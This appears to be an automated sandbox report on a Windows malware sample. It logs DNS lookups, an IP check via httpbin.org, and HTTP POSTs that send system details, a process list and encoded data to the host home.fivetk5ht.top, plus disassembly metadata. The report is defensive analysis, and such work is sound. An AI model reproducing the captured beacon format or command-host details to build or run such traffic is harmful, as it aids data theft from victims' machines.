                                                            Dec 20, 2024 16:32:28.060715914 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.060903072 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.060911894 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.061042070 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.061228991 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.061239004 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.061410904 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.061422110 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.061429977 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.061439991 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062066078 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062076092 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062096119 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062105894 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062114954 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062124968 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062134027 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062144041 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062191010 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062323093 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062331915 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062340975 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062350035 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062381029 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062413931 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062439919 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062531948 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062541962 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062580109 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062673092 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062683105 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062782049 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062792063 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062948942 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062958956 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062968016 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062985897 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.063035965 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.063045979 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.064120054 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.064130068 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.064137936 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.064147949 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.064157009 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.064165115 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.064176083 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.064184904 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.064194918 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.064204931 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.064213991 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.064223051 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.064230919 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.064241886 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.064250946 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.064883947 CET4970380192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:28.064955950 CET4970380192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:28.107532978 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.107990980 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.108094931 CET4970380192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:28.108777046 CET4970380192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:28.179625988 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.179656982 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.179748058 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.179757118 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.179862022 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.179990053 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.180006027 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.180023909 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.180067062 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.184639931 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.184731007 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.184807062 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.184834003 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.184844017 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.184901953 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.185003996 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.185096025 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.185106993 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.185116053 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.185127020 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.185178041 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.185216904 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.185228109 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.185281992 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.185391903 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.185403109 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.185420036 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.185534000 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.185585022 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.185656071 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.185666084 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.185707092 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.185774088 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.185785055 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.185931921 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.185942888 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.185951948 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.186048985 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.186058998 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.186069012 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.186079025 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.186110973 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.186134100 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.186212063 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.186222076 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.186350107 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.186542988 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.186553001 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.186566114 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.186664104 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.186674118 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.186867952 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.186880112 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.186894894 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.186906099 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.187103987 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.187114000 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.187123060 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.187133074 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.187143087 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.187215090 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.187227964 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.187237024 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.227669001 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.228415966 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:29.841876984 CET4970980192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:29.962083101 CET8049709185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:29.962228060 CET4970980192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:29.962542057 CET4970980192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:30.082689047 CET8049709185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:31.252634048 CET8049709185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:31.252927065 CET8049709185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:31.253174067 CET4970980192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:31.253267050 CET4970980192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:31.372951031 CET8049709185.121.15.192192.168.2.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 20, 2024 16:32:21.756201982 CET | 52362 | 53 | 192.168.2.7 | 1.1.1.1
Dec 20, 2024 16:32:21.756289959 CET | 52362 | 53 | 192.168.2.7 | 1.1.1.1
Dec 20, 2024 16:32:21.893759966 CET | 53 | 52362 | 1.1.1.1 | 192.168.2.7
Dec 20, 2024 16:32:22.041868925 CET | 53 | 52362 | 1.1.1.1 | 192.168.2.7
Dec 20, 2024 16:32:26.301234961 CET | 65134 | 53 | 192.168.2.7 | 1.1.1.1
Dec 20, 2024 16:32:26.301234961 CET | 65134 | 53 | 192.168.2.7 | 1.1.1.1
Dec 20, 2024 16:32:26.590204000 CET | 53 | 65134 | 1.1.1.1 | 192.168.2.7
Dec 20, 2024 16:32:26.710706949 CET | 53 | 65134 | 1.1.1.1 | 192.168.2.7
Dec 20, 2024 16:32:29.699081898 CET | 65136 | 53 | 192.168.2.7 | 1.1.1.1
Dec 20, 2024 16:32:29.699147940 CET | 65136 | 53 | 192.168.2.7 | 1.1.1.1
Dec 20, 2024 16:32:29.837148905 CET | 53 | 65136 | 1.1.1.1 | 192.168.2.7
Dec 20, 2024 16:32:29.837187052 CET | 53 | 65136 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 20, 2024 16:32:21.756201982 CET | 192.168.2.7 | 1.1.1.1 | 0x1ddf | Standard query (0) | httpbin.org | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:32:21.756289959 CET | 192.168.2.7 | 1.1.1.1 | 0x421c | Standard query (0) | httpbin.org | 28 | IN (0x0001) | false
Dec 20, 2024 16:32:26.301234961 CET | 192.168.2.7 | 1.1.1.1 | 0xa6fa | Standard query (0) | home.fivetk5ht.top | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:32:26.301234961 CET | 192.168.2.7 | 1.1.1.1 | 0x10dd | Standard query (0) | home.fivetk5ht.top | 28 | IN (0x0001) | false
Dec 20, 2024 16:32:29.699081898 CET | 192.168.2.7 | 1.1.1.1 | 0x8e68 | Standard query (0) | home.fivetk5ht.top | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:32:29.699147940 CET | 192.168.2.7 | 1.1.1.1 | 0x7bc | Standard query (0) | home.fivetk5ht.top | 28 | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 20, 2024 16:32:22.041868925 CET | 1.1.1.1 | 192.168.2.7 | 0x1ddf | No error (0) | httpbin.org | | 98.85.100.80 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:32:22.041868925 CET | 1.1.1.1 | 192.168.2.7 | 0x1ddf | No error (0) | httpbin.org | | 34.226.108.155 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:32:26.590204000 CET | 1.1.1.1 | 192.168.2.7 | 0xa6fa | No error (0) | home.fivetk5ht.top | | 185.121.15.192 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:32:29.837148905 CET | 1.1.1.1 | 192.168.2.7 | 0x8e68 | No error (0) | home.fivetk5ht.top | | 185.121.15.192 | A (IP address) | IN (0x0001) | false
                                                            • httpbin.org
                                                            • home.fivetk5ht.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49703 | 185.121.15.192 | 80 | 5140 | C:\Users\user\Desktop\t6VDbnvGeN.exe
Timestamp | Bytes transferred | Direction | Data
Dec 20, 2024 16:32:26.834173918 CET | 12360 | OUT | POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1
                                                            Host: home.fivetk5ht.top
                                                            Accept: */*
                                                            Content-Type: application/json
                                                            Content-Length: 560191
                                                            Data Ascii: { "ip": "8.46.123.189", "current_time": "1734708743", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 556 }, { "name": "services.exe", "pid": 624 }, { "name": "lsass.exe", "pid": 632 }, { "name": "svchost.exe", "pid": 748 }, { "name": "fontdrvhost.exe", "pid": 772 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "svchost.exe", "pid": 864 }, { "name": "svchost.exe", "pid": 912 }, { "name": "dwm.exe", "pid": 976 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 704 }, { "name": "svchost.exe", "pid": 860 }, { "name": "svchost.exe", "pid": [TRUNCATED]
                                                            Data Ascii: bmzn2Ha\/lXMLQSbGwdrbJG2nBwecVsrYh\/Evwx8NHXvCUB+K\/wu1n4x6Fr13qeuWvhvRfh\/wCEr34kWfxA1vxXfSeGDd2EXw6T4S+PL\/xgdH07X4rWw0OWfTJdV82BZK1jaXupX3xlsdP1LwbeL8Dvgd4b\/aG8WalF4kv4NJ1f4a+LfDPhPxz4fuvCFxqPhyxutV1nU\/AfixPGttoup2Oh3R8PeHfFlw5jutDktJvzHN
                                                            Dec 20, 2024 16:32:27.116830111 CET27192OUTData Raw: 7a 39 52 54 4a 47 54 35 5c 2f 6b 5c 2f 36 5a 53 5c 2f 34 66 58 33 35 4e 54 37 50 7a 5c 2f 44 5c 2f 67 6e 51 56 70 49 33 58 61 5c 2f 37 78 34 2b 6e 50 34 65 6e 34 6e 33 37 30 7a 61 2b 32 48 35 43 6a 5c 2f 36 71 57 54 5c 2f 32 31 5c 2f 6c 5c 2f 6e
                                                            Data Ascii: z9RTJGT5\/k\/6ZS\/4fX35NT7Pz\/D\/gnQVpI3Xa\/7x4+nP4en4n370za+2H5Cj\/6qWT\/21\/l\/nirRV\/MTf5n+u\/5Zy\/uP\/rVHtffvf5D53lfvP+Wv8vp1\/nR7Pz\/D\/ggM8v8Adwozl0\/0jzfyo+QKjzP5f\/PXt\/o\/+fx\/KiTfIrp9zr3\/AMjnn8KZ5j8On2fyfXyv3H\/Xraf5OazOghb729EkTy\/
                                                            Dec 20, 2024 16:32:27.236087084 CET7416OUTData Raw: 38 5c 2f 6e 5c 2f 4c 74 55 30 6e 2b 72 64 5c 2f 33 6d 38 5a 69 69 5c 2f 36 62 66 35 5c 2f 4f 6d 72 76 4d 62 66 4a 38 5c 2f 6c 66 38 65 37 5c 2f 41 4c 2b 66 5c 2f 50 38 41 6e 31 71 6a 53 6e 31 2b 58 36 6c 57 52 58 38 78 33 52 49 34 55 5c 2f 31 65
                                                            Data Ascii: 8\/n\/LtU0n+rd\/3m8Zii\/6bf5\/OmrvMbfJ8\/lf8e7\/AL+f\/P8An1qjSn1+X6lWRX8x3RI4U\/1e\/P8An\/65+nJ5b7UkRN6f1A6e36ntT\/MjjjRP4\/8Arl7\/AJf5zTJNnlqhSRHk6Rxyf5\/+vig0GDf8iP5b+ZKfN8vjn6\/h\/jULR+XsRPMdJIvKhj7\/AOf59feptyKp\/wBXD+64\/Pt\/2ERj\/PNM8t22
                                                            Dec 20, 2024 16:32:28.107532978 CET | 212 | IN | HTTP/1.0 503 Service Unavailable
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            1 | 192.168.2.7 | 49709 | 185.121.15.192 | 80 | 5140 | C:\Users\user\Desktop\t6VDbnvGeN.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 20, 2024 16:32:29.962542057 CET | 284 | OUT | POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1
                                                            Host: home.fivetk5ht.top
                                                            Accept: */*
                                                            Content-Type: application/json
                                                            Content-Length: 143
                                                            Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                            Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
                                                            Dec 20, 2024 16:32:31.252634048 CET | 212 | IN | HTTP/1.0 503 Service Unavailable
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            0 | 192.168.2.7 | 49701 | 98.85.100.80 | 443 | 5140 | C:\Users\user\Desktop\t6VDbnvGeN.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-12-20 15:32:24 UTC | 52 | OUT | GET /ip HTTP/1.1
                                                            Host: httpbin.org
                                                            Accept: */*
                                                            2024-12-20 15:32:24 UTC | 224 | IN | HTTP/1.1 200 OK
                                                            Date: Fri, 20 Dec 2024 15:32:24 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 31
                                                            Connection: close
                                                            Server: gunicorn/19.9.0
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Allow-Credentials: true
                                                            2024-12-20 15:32:24 UTC | 31 | IN | Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                            Data Ascii: { "origin": "8.46.123.189"}



                                                            Target ID:1
                                                            Start time:10:32:18
                                                            Start date:20/12/2024
                                                            Path:C:\Users\user\Desktop\t6VDbnvGeN.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\t6VDbnvGeN.exe"
                                                            Imagebase:0x7c0000
                                                            File size:4'454'912 bytes
                                                            MD5 hash:9E3EEBDF7F1998324106447A4EB441C8
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true


                                                              Execution Graph

                                                              Execution Coverage:2.8%
                                                              Dynamic/Decrypted Code Coverage:37.2%
                                                              Signature Coverage:9.4%
                                                              Total number of Nodes:406
                                                              Total number of Limit Nodes:44
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                                              • API String ID: 0-1590685507
                                                              • Opcode ID: 9f3b585c7eeb77f24466be9716a651bec66db287a3d89771aed60ae47900b65c
                                                              • Instruction ID: 02e7726865e38025d8ef5f531683e382ce2dbadecaa790c35676edef2f896dc8
                                                              • Opcode Fuzzy Hash: 9f3b585c7eeb77f24466be9716a651bec66db287a3d89771aed60ae47900b65c
                                                              • Instruction Fuzzy Hash: 57C2AE31A047489FD724CF28C484B6AB7E1FF84314F04866DED999B3A2DB75E984CB91

                                                              Control-flow Graph

                                                              APIs
                                                              • GetSystemInfo.KERNELBASE ref: 007C2579
                                                              • GlobalMemoryStatusEx.KERNELBASE ref: 007C25CC
                                                              • GetDriveTypeA.KERNELBASE ref: 007C2647
                                                              • GetDiskFreeSpaceExA.KERNELBASE ref: 007C267E
                                                              • KiUserCallbackDispatcher.NTDLL ref: 007C27E2
                                                              • FindFirstFileW.KERNELBASE ref: 007C28F8
                                                              • FindNextFileW.KERNELBASE ref: 007C291F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              • Associated: 00000001.00000002.1426313932.00000000007C0000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.1426333607.0000000000F01000.00000040.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.1426333607.0000000000F03000.00000040.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.1427581945.0000000000F06000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.1427600992.0000000000F08000.00000040.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.1427600992.0000000001090000.00000040.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.1427600992.000000000119C000.00000040.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.1427600992.00000000011A4000.00000040.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.1427600992.0000000001277000.00000040.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.1427600992.000000000127F000.00000040.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.1427600992.000000000128D000.00000040.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.1430214790.000000000128E000.00000080.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.1431718489.0000000001443000.00000040.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.1432958206.0000000001445000.00000040.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.1433289138.0000000001446000.00000080.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                                              • String ID: ;%|$@$`
                                                              • API String ID: 3271271169-268358005
                                                              • Opcode ID: b0c9f61b96b4fe71df57e27bcc2e845c360e83fd918fed3877330265556fc865
                                                              • Instruction ID: 091f2974318bfa4f07832f7aeb98205891caa49be03c2ab6c8163301c68d7fd8
                                                              • Opcode Fuzzy Hash: b0c9f61b96b4fe71df57e27bcc2e845c360e83fd918fed3877330265556fc865
                                                              • Instruction Fuzzy Hash: 08D1C1B49053099FCB10EFA8C99569EBBF0BF48344F10886DE998D7351E7349A84DF92

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1395 (entry block 7c29ff-7c2a2f): graph node and edge listing omitted; named calls in the graph: FindFirstFileA, RegOpenKeyExA, CharUpperA, QueryFullProcessImageNameA, CloseHandle.
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                              • String ID: 0
                                                              • API String ID: 2406880114-4108050209
                                                              • Opcode ID: 5e18397ceb18fff940a9056e3c0323b82d7c3859c9ef693dedc328123c9e8e90
                                                              • Instruction ID: d330aa43df5d7b4b49a61fea23b50b9075c8a58004e086eb8cfa2a3b3587e78e
                                                              • Opcode Fuzzy Hash: 5e18397ceb18fff940a9056e3c0323b82d7c3859c9ef693dedc328123c9e8e90
                                                              • Instruction Fuzzy Hash: 8EE1D1B09053099FCB10EF68D994A9DBBF4BB48344F10886DE8889B351E7789A859F52

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1541 (entry block 7d05b0-7d05b7): graph node and edge listing omitted; the API calls it references are listed under APIs below.
                                                              APIs
                                                              • WSAEventSelect.WS2_32(?,?,?), ref: 007D0711
                                                              • WSAEventSelect.WS2_32(?,?,00000000), ref: 007D09DD
                                                              • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 007D09FB
